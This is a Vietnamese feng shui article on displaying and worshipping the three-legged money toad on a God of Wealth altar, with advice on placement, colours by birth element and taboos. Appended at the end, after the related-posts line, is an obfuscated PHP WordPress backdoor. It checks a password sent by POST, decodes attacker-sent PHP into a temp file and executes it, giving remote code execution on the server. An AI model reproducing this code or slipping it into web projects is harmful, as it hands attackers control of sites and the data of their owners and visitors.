Cách thờ cúng Ông Cóc trên bàn thờ Thần Tài Thổ Địa

Trong dân gian ngày xưa hay có câu “con cóc là cậu ông trời, hễ ai đánh nó là trời đánh cho” diễn ta con cóc trong câu nói làm thay đổi thời tiết, mưa thuận gió hòa giúp người nông dân thu hoạch được mùa. Từ đó con cóc được xem là một linh vật trong phong thủy, người ta hay đặt con cóc ngậm tiền trước cửa hàng hay trên bàn làm việc để mong gia chủ thêm tài lộc, may mắn, nhưng không phải ai cũng biết cách thờ cúng ông cóc đúng và đầy đủ chính xác nhất. Nội dung bài viết sau đây Wiki Cách Làm sẽ mách nhỏ một số kiến thức hay về cách thờ cúng ông cóc đúng chuẩn ngay tại nhà nhé!

Cách thờ cúng Ông Cóc trên bàn thờ Thần Tài Thổ Địa-1

Hướng dẫn cách thờ cúng Ông Cóc đúng chuẩn

Ý nghĩa của việc thờ cúng Ông Cóc

Cách thờ cúng Ông Cóc trên bàn thờ Thần Tài Thổ Địa-2

Ông Cóc hay còn có tên gọi khác “Thiềm Thừ” là một trong những linh vật phong thủy mang tài lộc, vượng khí cho gia chủ, tượng trưng cho con cóc 3 chân là linh vật dùng để huy tụ những nhân tài có năng lực rất mạnh giúp gia chủ thêm sức lực dồi dào, công việc làm ăn phát tài phát lộc.

Nguồn gốc Cóc ngậm tiền trên bàn thờ Thần Tài Thổ Địa

Theo truyền thuyết từ Trung Quốc, quan niệm người xưa truyền lại người ta tin rằng cứ vào mỗi dịp trăng tròn, nếu có cóc ngậm tiền xuất hiện ở gần nhà bạn nghĩa là bạn sẽ rất may mắn, sẽ nhận được những tin tốt lành trong công việc lẫn cuộc sống.

Xem Thêm  Xem hướng nhà chung cư theo tuổi vợ chồng hợp phong thủy

Cóc ngậm tiền được tả lại là có 3 chân, miệng ngậm một đồng tiền xu, có dáng vẻ dữ dằn và ở tư thế chuẩn bị nhảy vào nhà nhả tiền cho gia chủ. Chính bởi khả năng nhả tiền vô hạn của cóc 3 chân này nên dân gian mới coi đó là biểu tượng của tài vận, may mắn vì thế gọi là Cóc chiêu tài.

Cóc  ngậm tiền phong thủy còn mang lại may mắn trong công việc và cuộc sống cho gia chủ. Ngoài ra, cóc ngậm tiền còn mang lại bình an, giúp cho gia chủ hóa giả được những vận khí xấu từ bên ngoài vào, gia chủ tránh được nhiều tai họa và nguy hiểm. Vì thế người ta hay dùng cóc phong thủy để biến xấu thành tốt trong phong thủy nhà cửa.

Khi nào nên có Ông Cóc?

Tùy theo tuổi và hoàn cảnh gia đình mà chúng ta có thể bày trí Ông Cóc. Trường hợp các gia đình đang hoạt động kinh doanh buôn bán, nếu có chú cóc ngậm tiền sẽ giúp tài lộc tăng tiến, thịnh vượng. Linh vật cóc còn giúp hạn chế xui rủi xảy ra và bảo vệ gia chủ giúp họ luôn có nhiều may mắn và thành công.

Cách thờ cúng Ông Cóc trên bàn thờ Thần Tài Thổ Địa-3

Dựa theo phong thủy, chúng ta căn cứ vào năm sinh và bản mệnh sẽ chọn cóc ngậm tiền có các màu khác nhau. Ví dụ với người mệnh Kim, Mộc và Thủy nên chọn cóc có màu vàng, xanh lá cây. Trường hợp bản mệnh thuộc mệnh Hỏa hoặc Thổ chúng ta nên chọn cóc có màu đỏ, tím hoặc vàng nâu.

Cách đặt Ông Cóc ở bàn Thần Tài Thổ Địa hợp phong thủy

Cóc ngậm tiền hay còn gọi là Cóc Thiềm Thừ là linh vật có xếp hạng quan trọng thứ hai trong phong thủy, chỉ đứng sau linh thú Tì Hưu. Người ta hay đặt cóc ngậm tiền trước cửa nhà, trên bàn làm việc, trong tiệm vàng để mang đến may mắn, tài lộc cho gia chủ, ngày nay biểu tượng cóc ngậm tiền còn được tạo thành trên những chiếc nhẫn và đặt trên bàn thờ thần tài thổ địa để mang đến may mắn nhiều hơn nữa.

Xem Thêm  Mùng 1 có nên cắt tóc hay gội đầu không?

Vị trí đặt Ông Cóc hợp phong thủy và đẹp nhất

Cách thờ Ông Cóc và vị trí đặt nên quan tâm:

+ Đặt ở 2 góc của cửa chính, hướng quay đầu vào trong nhà với ý nghĩa cóc ngậm tiền nhảy vào nhà mang tài lộc, phú quý đến cho gia chủ.

+ Đặt ở bên trong tủ, dưới gầm bàn, trong góc phòng nhưng hướng quay nhất định phải quay vào trong nhà

Cách thờ cúng Ông Cóc trên bàn thờ Thần Tài Thổ Địa-4

+ Đặt ông cóc trên bàn thờ Thần Tài ở 2 góc trước của ban thờ Thần Tài – Thổ Địa, hướng quay đầu vào trong nhà.

Ngoài ra, Ông Cóc thần tài còn đươc mọi người đặt trên bàn làm việc ở công ty, văn phòng hay cửa hàng với ý nghĩa mang tài lộc và may mắn trong kinh doanh.

Lựa chọn theo màu sắc Cóc ngậm tiền để hợp với màu bản mệnh gia chủ

Nhiều người cho rằng trong phong thủy màu sắc có khả năng hỗ trợ, cần bằng và điều hòa âm dương cho nên việc lựa chọn một linh vật mang vận mệnh được gắn liền với 1 hoặc 1 vài màu sắc tương sinh, tương hợp giúp gia chủ gặp nhiều may mắn, vạn sự như ý, phát tài phát lộc, công danh sự nghiệp ngày càng phát triển.

Tham khảo một số màu sắc tương sinh với tuổi gia chủ

Những người mệnh Kim (gồm các năm sinh 1962, 1963, 1970, 1971, 1984, 1985, 1992, 1993, 2000, 2001….)

->Nên chọn Cóc ngậm tiền có màu vàng, xám bạc để đặt bàn thờ Thần tài cầu may mắn, tài lộc

Người mệnh Mộc (gồm các năm sinh 1958, 1959, 1972, 1973, 1988, 1989, 2001, 2003….)

Xem Thêm  Cách kê giường ngủ theo phong thủy đúng chuẩn nên biết

->Nên chọn Cóc ngậm tiền có màu đen, màu xanh dương, xanh dương nhạt.

Người mệnh Thủy (gồm các năm sinh 1953, 1966, 1974, 1975, 1982, 1983, 1996, 1997…..)

->Nên chọn cóc ngậm tiền có màu xanh lá cây, xanh nước biển, màu đen.

Người mệnh Hỏa (gồm các năm sinh 1949, 1956, 1957, 1964, 1965, 1978, 1979, 1986, 1987, 1994, 1995….)

->Nên chọn Cóc ngậm tiền đặt bàn thờ Thần tài có màu đỏ, xanh lá cây, màu tím

Người mệnh Thổ (gồm các năm sinh 1968, 1969, 1976, 1977, 1990, 1991, 1998, 1999……)

->Nên chọn Cóc ngậm tiền có màu vàng nâu, vàng nhạt, màu đỏ để đặt bàn thờ Thần tài.

Một số cấm kỵ khi thờ cúng Ông Cóc

Để tài lộc phú quý, hạn chế rủi ro chúng ta nên chú ý một số điều cơ bản như sau:

– Không thờ Ông Cóc chiêu tài ở những nơi ô uế như gần nhà vệ sinh, phòng ngủ….

– Thiềm Thừ cần Thủy tránh Hỏa, tránh đặt đối diện với bể cá hay hồ nước.

– Phụ nữ đang trong thời kỳ mang thai không được sờ vào Cóc ngậm tiền.

– Khi muốn di chuyển cóc từ nơi này đến nơi khác cần dùng vải đỏ che đầu cóc.

Xem thêm: Cách đeo nhẫn hợp phong thủy ngũ hành mang tài vận

Bên trên là một số thông tin kiến thức hay về cách thờ cúng Ông Cóc, hi vọng thông qua nội dung bài viết này sẽ giúp gia chủ có thêm thông tin bổ ích về việc thờ cúng Thiềm Thừ một cách đúng và chính xác nhất. Tuy nhiên, nội dung bài viết chỉ mang chất tham khảo dành cho ai có quan niệm tâm linh, chỉ mong việc thờ cúng này sẽ mang lại cho gia chủ thật nhiều tài lộc và may mắn, công danh sự nghiệp ngày càng phát triển, vạn sự như ý.

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}